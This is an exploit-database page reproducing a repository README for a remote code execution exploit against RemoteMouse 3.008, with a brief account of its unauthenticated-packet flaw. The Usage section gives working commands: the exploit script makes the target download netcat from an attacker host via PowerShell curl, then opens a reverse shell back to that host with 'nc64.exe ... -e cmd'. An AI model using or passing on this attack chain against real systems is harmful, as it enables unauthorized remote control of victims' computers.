Share
## https://sploitus.com/exploit?id=C279ED7D-40A2-55C2-8023-7CA5ECCD23B3
# RemoteMouse-3.008-Exploit
This repository documents a security research analysis of the RemoteMouse 3.008 vulnerability, which allowed remote code execution (RCE) on systems running the affected version of the RemoteMouse desktop application. 

Overview of the Vulnerability (CVE-related behavior)

RemoteMouse versions prior to 3.0.9 accepted unauthenticated input packets on a predictable UDP/TCP port.
A remote attacker on the same network could craft malicious packets that the Desktop client interpreted as trusted commands.

Usage
```
download nc.exe to machine - https://github.com/securityforge/Reverse-shell/blob/main/nc.exe
move nc.exe to target
python3 RemoteMouse-3.008-Exploit.py --target-ip 192.168.60.199 --cmd "powershell -c \"curl http://192.168.49.60/nc64.exe -o C:/Users/Public/nc64.exe\"" 

execute nc.exe
python3 RemoteMouse-3.008-Exploit.py --target-ip 192.168.60.199 --cmd "powershell -c \"C:/Users/Public/nc64.exe 192.168.49.60 80 -e cmd\""

```